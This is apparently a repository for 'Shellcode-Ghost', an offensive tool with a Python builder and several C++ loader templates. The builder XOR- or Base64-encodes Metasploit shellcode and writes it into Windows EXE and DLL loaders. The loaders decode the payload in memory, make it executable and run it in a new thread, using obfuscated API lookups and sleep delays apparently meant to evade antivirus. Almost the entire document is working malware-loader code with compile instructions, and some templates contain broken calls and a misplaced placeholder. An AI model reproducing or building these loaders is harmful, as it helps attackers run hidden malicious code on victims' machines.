├── README.md
├── xortemplate.cpp
├── base64template.cpp
├── xor-template-dll.cpp
├── xor-func-template-dll.cpp
└── Shellcode-Ghost.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode-Ghost
 2 | 
 3 | usage :<br />
 4 | python3 Shellcode-Ghost.py  -s msfvenomshellcode.bin -c  -xor xorkey -xorf -t template file.cpp
 5 | 
 6 | compile on Linux :<br />
 7 | x86_64-w64-mingw32-g++ -shared result.cpp -o loader.dll
 8 | <br />
 9 | x86_64-w64-mingw32-g++ result.cpp -o loader.exe
10 | 


--------------------------------------------------------------------------------
/xortemplate.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | #include <stdlib.h>
 4 | #include <string.h>
 5 | 
 6 | # compile: x86_64-w64-mingw32-g++ xortemplate.cpp -o Myloader.exe
 7 | 
 8 | void XOR(char * data, size_t data_len, char * key, size_t key_len) {
 9 |         int j;
10 |         j = 0;
11 |         for (int i = 0; i < data_len; i++) {
12 |                 if (j == key_len - 1) j = 0;
13 | 
14 |                 data[i] = data[i] ^ key[j];
15 |                 j++;
16 |         }
17 | }
18 | 
19 | int main(void) {
20 |         void * exec_mem;
21 |         BOOL rv;
22 |         HANDLE th;
23 |         DWORD oldprotect = 0;
24 | 
25 |         unsigned char payload[] = "payload:";
26 |         unsigned int pay_len = sizeof(payload);
27 |         char key[] = "key:";
28 |         exec_mem = VirtualAlloc(0, pay_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
29 | 
30 |         XOR((char *) payload, pay_len, key, sizeof(key));
31 | 
32 |         RtlMoveMemory(exec_mem, payload, pay_len);
33 | 
34 |         rv = VirtualProtect(exec_mem, pay_len, PAGE_EXECUTE_READ, &oldprotect);
35 | 
36 |         if ( rv != 0 ) {
37 |                         th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
38 |                         WaitForSingleObject(th, -1);
39 |         }
40 | 
41 |         return 0;
42 | }
43 | 


--------------------------------------------------------------------------------
/base64template.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | #include <stdlib.h>
 4 | #include <string.h>
 5 | #include <wincrypt.h>
 6 | 
 7 | # compile: x86_64-w64-mingw32-g++ base64template.cpp -o Myloader.exe -lcrypt32
 8 | 
 9 | unsigned char payload[] = "payload:";
10 | unsigned int pay_len = sizeof(payload);
11 | 
12 | 
13 | int DecodeBase64( const BYTE * src, unsigned int srcLen, char * dst, unsigned int dstLen ) {
14 | 
15 |         DWORD outLen;
16 |         BOOL fRet;
17 | 
18 |         outLen = dstLen;
19 |         fRet = CryptStringToBinary( (LPCSTR) src, srcLen, CRYPT_STRING_BASE64, (BYTE * )dst, &outLen, NULL, NULL);
20 | 
21 |         if (!fRet) outLen = 0;
22 | 
23 |         return( outLen );
24 | }
25 | 
26 | 
27 | int main(void) {
28 | 
29 |         void * exec_mem;
30 |         BOOL rv;
31 |         HANDLE th;
32 |         DWORD oldprotect = 0;
33 | 
34 |         exec_mem = VirtualAlloc(0, pay_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
35 |         DecodeBase64((const BYTE *)payload, pay_len, (char *) exec_mem, pay_len);
36 |         rv = VirtualProtect(exec_mem, pay_len, PAGE_EXECUTE_READ, &oldprotect);
37 |         if ( rv != 0 ) {
38 |                         th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
39 |                         WaitForSingleObject(th, -1);
40 |         }
41 | 
42 |         return 0;
43 | }
44 | 


--------------------------------------------------------------------------------
/xor-template-dll.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>                                                                                  
 3 | #include <stdlib.h>
 4 | #include <string.h>
 5 | 
 6 | # compile: x86_64-w64-mingw32-g++ -shared xor-template-dll.cpp -o Myloader.dll
 7 | 
 8 | void XOR(char * data, size_t data_len, char * key, size_t key_len) {                                         
 9 |         int j;
10 |         j = 0;
11 |         for (int i = 0; i < data_len; i++) {
12 |                 if (j == key_len - 1) j = 0;
13 | 
14 |                 data[i] = data[i] ^ key[j];
15 |                 j++;
16 |         }
17 | }
18 | 
19 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
20 | 
21 |     switch (ul_reason_for_call)  {
22 |     case DLL_PROCESS_ATTACH:
23 |     case DLL_PROCESS_DETACH:
24 |     case DLL_THREAD_ATTACH:
25 |     case DLL_THREAD_DETACH:                                                                                 
26 |                    break;
27 |     }
28 |     return TRUE;
29 | }
30 | 
31 | extern "C" {
32 |         __declspec(dllexport) BOOL WINAPI RunME(void) {
33 |                 void * exec_mem;
34 |                 BOOL rv;
35 |                 HANDLE th;
36 |                 DWORD oldprotect = 0;
37 | 
38 |                 unsigned char payload[] = "key:";                                                                    
39 |                 unsigned int pay_len = sizeof(payload);
40 |                 char key[] = "key:";
41 |                 exec_mem = VirtualAlloc(0, pay_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
42 |                 Sleep(3000);
43 |                 XOR((char *) payload, pay_len, key, sizeof(key));
44 |                 RtlMoveMemory(exec_mem, payload, pay_len);
45 |                 rv = VirtualProtect(exec_mem, pay_len, PAGE_EXECUTE_READ, &oldprotect);
46 |                 if ( rv != 0 ) {
47 |                         th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
48 |                         WaitForSingleObject(th, -1);                                                               
49 |                 }
50 | 
51 |                 return TRUE;
52 |         }
53 | }
54 | 


--------------------------------------------------------------------------------
/xor-func-template-dll.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <stdio.h>
 3 | #include <stdlib.h>
 4 | #include <string.h>
 5 | 
 6 | typedef LPVOID(WINAPI *PVAlloc)(PVOID, SIZE_T, DWORD, DWORD);
 7 | typedef VOID (WINAPI * PRMMemory)(LPVOID,  const void*, SIZE_T );
 8 | typedef BOOL (WINAPI * PVProtect)( LPVOID , SIZE_T , DWORD , PDWORD );
 9 | typedef HANDLE(WINAPI *PCThread)(PSECURITY_ATTRIBUTES, SIZE_T, PTHREAD_START_ROUTINE, PVOID, DWORD, PDWORD);
10 | typedef DWORD(WINAPI *PWFSObject)(HANDLE, DWORD);
11 | 
12 | void XOR(char * data, size_t data_len, char * key, size_t key_len) {
13 |         int j;
14 |         j = 0;
15 |         for (int i = 0; i < data_len; i++) {
16 |                 if (j == key_len - 1) j = 0;
17 | 
18 |                 data[i] = data[i] ^ key[j];
19 |                 j++;
20 |         }
21 | }
22 | 
23 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
24 | 
25 |     switch (ul_reason_for_call)  {
26 |     case DLL_PROCESS_ATTACH:
27 |     case DLL_PROCESS_DETACH:
28 |     case DLL_THREAD_ATTACH:
29 |     case DLL_THREAD_DETACH:
30 |         break;
31 |     }
32 |     return TRUE;
33 | }
34 | 
35 | extern "C" {
36 |         __declspec(dllexport) BOOL WINAPI RunME(void) {
37 |                 void * exec_mem;
38 |                 BOOL rv;
39 |                 HANDLE th;
40 |                 DWORD oldprotect = 0;
41 | 
42 |                 unsigned char payload[] = "payload:";
43 |                 unsigned int pay_len = sizeof(payload);
44 |                 char key[] = "key:";
45 |                 HMODULE hKernel32 = GetModuleHandle("Kernel32.dll");
46 |                 PVAlloc pVirtualAlloc = (PVAlloc)GetProcAddress(hKernel32, XOR("VirtualAlloc:", pay_len, key, sizeof(key))));
47 |                 exec_mem = pVirtualAlloc(0, pay_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
48 |                 Sleep(3000);
49 |                 XOR((char *) payload, pay_len, key, sizeof(key));
50 |                 PRMMemory pRtlMoveMemory = (PRMMemory)GetProcAddress(GetModuleHandle("Ntdll.dll"), XOR("RtlMoveMemory:",pay_len, key, sizeof(key)));
51 |                 pRtlMoveMemory(exec_mem, payload, pay_len);
52 |                 PVProtect pVirtualProtect = (PVProtect)GetProcAddress(hKernel32, XOR("VirtualProtect:",pay_len, key, sizeof(key)));
53 |                 rv = pVirtualProtect(exec_mem, pay_len, PAGE_EXECUTE_READ, &oldprotect);
54 |                 if ( rv != 0 ) {
55 |                         PCThread pCreateThread = (PCThread)GetProcAddress(hKernel32, XOR("CreateThread:",pay_len, key, sizeof(key)));
56 |                         th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
57 |                         PWFSObject pWaitForSingleObject = (PWFSObject) GetProcAddress(hKernel32, "WaitForSingleObject");
58 |                         pWaitForSingleObject(th, -1);
59 |                 }
60 | 
61 |                 return TRUE;
62 |         }
63 | }
64 | 


--------------------------------------------------------------------------------
/Shellcode-Ghost.py:
--------------------------------------------------------------------------------
 1 | import base64, sys, argparse
 2 | 
 3 | def xorpayload(strchipher,  key):
 4 | 	return [hex(strchipher[i] ^ ord(key[i % len(key)])) for i in range(len(strchipher))]
 5 | 
 6 | def b64payload(payload):
 7 | 	return base64.b64encode(payload).decode()
 8 | 
 9 | def putkey(Mainstr, key):
10 | 	return Mainstr.replace("key:", key)
11 | 
12 | def putpayload(Mainstr, payload):
13 | 	return Mainstr.replace("payload:", payload)
14 | 
15 | def getshellcode(filename):
16 | 	return open(filename, 'rb').read()
17 | 
18 | def gettemplate(tempname):
19 | 	return open(tempname).read()
20 | 
21 | def resultcreate(filename, data):
22 | 	with open(filename, "w") as f:
23 | 		f.write(data)
24 | 
25 | if __name__ == "__main__":
26 | 	mparse = argparse.ArgumentParser()
27 | 	mparse.add_argument('-cs', '--csharp', action="store_true", help="-cs , --csharp\tCreate C# shellcode .\n")
28 | 	mparse.add_argument('-c', '--ansi-c', action="store_true", help="-c , --ansi-c\tCreate C shellcode .")
29 | 	mparse.add_argument('-t', '--template', metavar='template.c or template.cs',  help="-t , --template\tInclude the template you need to use . \n")
30 | 	mparse.add_argument('-b64', '--encode-base64', action="store_true", help="-b64 , --encode-base64\tUse Base64 encoding. \n")
31 | 	mparse.add_argument('-xor', '--encrypt-xor', metavar='XOR_KEY', help="-xor , --encrypt-xor\tUse XOR followed with the encryption key. \n")
32 | 	mparse.add_argument('-aes', '--encrypt-aes', metavar='AES_KEY', help="-aes , --encrypt-aes\tUse AES followed with the encryption key. \n")
33 | 	mparse.add_argument('-s', '--shellcode-file', metavar='RAW-SHELLCODE.bin', help="-s\t--shellcode-file\tRaw shellcode file . \n")
34 | 	args = mparse.parse_args()
35 | 	if args.shellcode_file == None:
36 | 		print("You must Use -s ( --shellcode-file )")
37 | 		exit()
38 | 	shellcode = getshellcode(args.shellcode_file)
39 | 	result = ""
40 | 	if args.ansi_c :
41 | 		print("Creating C Payload.....")
42 | 		result = shellcode
43 | 		if args.encode_base64:
44 | 			print("\t[*] Encoding Shellcode with Base64.")
45 | 			result = b64payload(shellcode)
46 | 		if args.encrypt_xor != None :
47 | 			print("\t[*] Encrypting Shellcode with XOR with Key : {}.".format(args.encrypt_xor))
48 | 			result = xorpayload(result,  args.encrypt_xor)
49 | 		if args.template != None:
50 | 			template = gettemplate(args.template)
51 | 			result = ''.join('\\x' + c[2:] for c in result)
52 | 			template = putpayload(template, str(result))
53 | 			if args.encrypt_xor != None :
54 | 				template = putkey(template, args.encrypt_xor)
55 | 			resultcreate("result.cpp", template)
56 | 
57 | 	if args.csharp :
58 | 		print("Creating C# Payload.....")
59 | 		result = shellcode
60 | 		if args.encode_base64:
61 | 			print("\t[*] Encoding Shellcode with Base64.")
62 | 			result = b64payload(shellcode)
63 | 		if args.encrypt_xor != None :
64 | 			print("\t[*] Encrypting Shellcode with XOR with Key : {}.".format(args.encrypt_xor))
65 | 			result = xorpayload(str(result),  args.encrypt_xor)
66 | 		if args.template != None:
67 | 			template = gettemplate(args.template)
68 | 			template = putpayload(template, result)
69 | 			if args.encrypt_xor != None :
70 | 				template = putkey(template, args.encrypt_xor)
71 | 			resultcreate("result.cs", template)
72 | 		print("byte[] shellcode = new byte[] {" + result + "};")
73 | 


--------------------------------------------------------------------------------